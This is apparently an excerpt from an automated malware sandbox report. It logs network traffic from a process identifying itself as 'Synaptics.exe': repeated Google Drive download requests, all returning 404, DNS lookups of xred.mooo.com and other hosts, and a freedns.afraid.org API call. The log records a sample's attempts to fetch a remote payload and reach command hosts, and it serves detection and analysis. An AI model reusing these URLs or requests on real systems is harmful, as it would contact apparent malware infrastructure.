                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                            Source: global trafficDNS traffic detected: DNS query: filedn.com
                            Source: global trafficDNS traffic detected: DNS query: docs.google.com
                            Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                            Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5CyZ8Ry0hRBMoQaKvjOLo-7dUnQ_6dON501F1RA2_qGz0yrgzbqh7k-I2fn4bIjLjbContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:57 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-cLrC06TI7cTFmOMkCSw2tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=O4iN5IOxf23kqpAqHJs_aF9KIEkavC4db8fvXtDOSh40Q7kbxnzU6nDxPE49KGn1Upx72cmG3NN0GTohw-johdvyQbL7l4JR3HuoUWf78GMDSGQhK9RxBNzIFRGHLMS8IY2iUnYPlfCloDF0QRl1r5wU1FU7L_3McvXp_ga72fpAgxvnLRCVeF0; expires=Tue, 01-Jul-2025 10:48:57 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7H7WZEZC07BeG3AqwYLyv60wXpmpOrKsIFfFQqoHc4bY4Nymd1oFVU541EBay93MIrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:57 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TinI2UiaYXj7SQbaaPqalQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=VC9Az_mxJ6FjsLomJdQOpKgQ4a1FhUiWGrzaZIMrw8k6urzaBLn7gtF1ACWlSJ8unr8PDR5SNcOe093vYylGPwpZvusWE7hocDA-7-p5uk-Flsh3bUQs_rlUzgEjafxKOB_oLSUQknDeVd8xqaAFKac_Rpc5-jpZSSFqffNXjgy_zxzFCv8KJUM; expires=Tue, 01-Jul-2025 10:48:57 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6iVXEp_BdGD8ayuHQebqLBYBGR6eoKetdqtcaKLn1RLrIB_ToziZx1YIZCCXjsdCJ3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:58 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-gZXcQIPd7C_z1zFawLmRBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=SrDjQsTi5aM3Y2MbUchHVvWZIqrlHKgIL685g4nhgEV4rJx4kjebBUMbDUxhRXpVu4_DMcHX3f-COVQnUJMe8p-5cN8H9skaZZTE_clRgqz-O9PdMlTZlbsmQzNT6xZryPDm-t1KC-oftlTjqjODq9KNhxmczYU_-fWhdxvUdtzEfL5peodoJq8; expires=Tue, 01-Jul-2025 10:48:58 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4pcGMXXu-uzf0A7AG1l2TkE6Jd3IlVD0YXR4t-ucZ5SqrEEZ1k-cPgFRjjsTceQV6bGr6iFyAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:58 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GP7RymNJYgkViWAzmghQ7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM; expires=Tue, 01-Jul-2025 10:48:58 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7xTkcSGTIYxMIdbHF8zE-CfhqmKlvyH9oRJfLkvNZGodKGHaSBO6-4rgr_YuY42A96V3g3WmQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:59 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xI9fW_5nQzH5VtB4tO5KvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC71VaAJcBcvCKWyCa9BMGU2nZlyp8GtXolj-lQsOz5bNUKYd1kWdw9eAhHRrDtBGwrTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:07 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8nVV3S4L_3FyQxwlvWNlJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7R7cFxHHtcni0KPFTj5q7gcGz3m9hostSfU-fTNgGDYaOt5FkB4DphgEuYoOUVoeQ1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:15 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Blns3e0y17h3wWXwHASITg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6-1JdaQmk17vmEfhkT175RaNvBIADOPkLIBECW2mQlgEB6zXA9BGAaM-rtx6_k7XwtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:15 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-kg5RHtC-4wM3TL9NMBvF7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5QpUgdRP6MCVpKSz8l7xbMelIWQQJjtXR-FXs2PUCTgNbo6W2OW67FslBwXge6LLAgpd6NV64Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:16 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-jXj_LjpmeKAe1s8vFFvzjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Tx6tBfmQh65dyzHPF0TNM06jtUDHQON5uBt6FA90nx3HeEgLYrm076K4Dt66uazWyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:16 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-plfEgZaNX81gChnJ6Lr7-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5S2IJ7GxATRRBPJL5WO93IJQulfmVN9N-PBfbHSBb4VIp0s41lyDZh_zNSbtdMmFJBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:17 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-pqzDrSWGpnO8A8-9GLRIZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
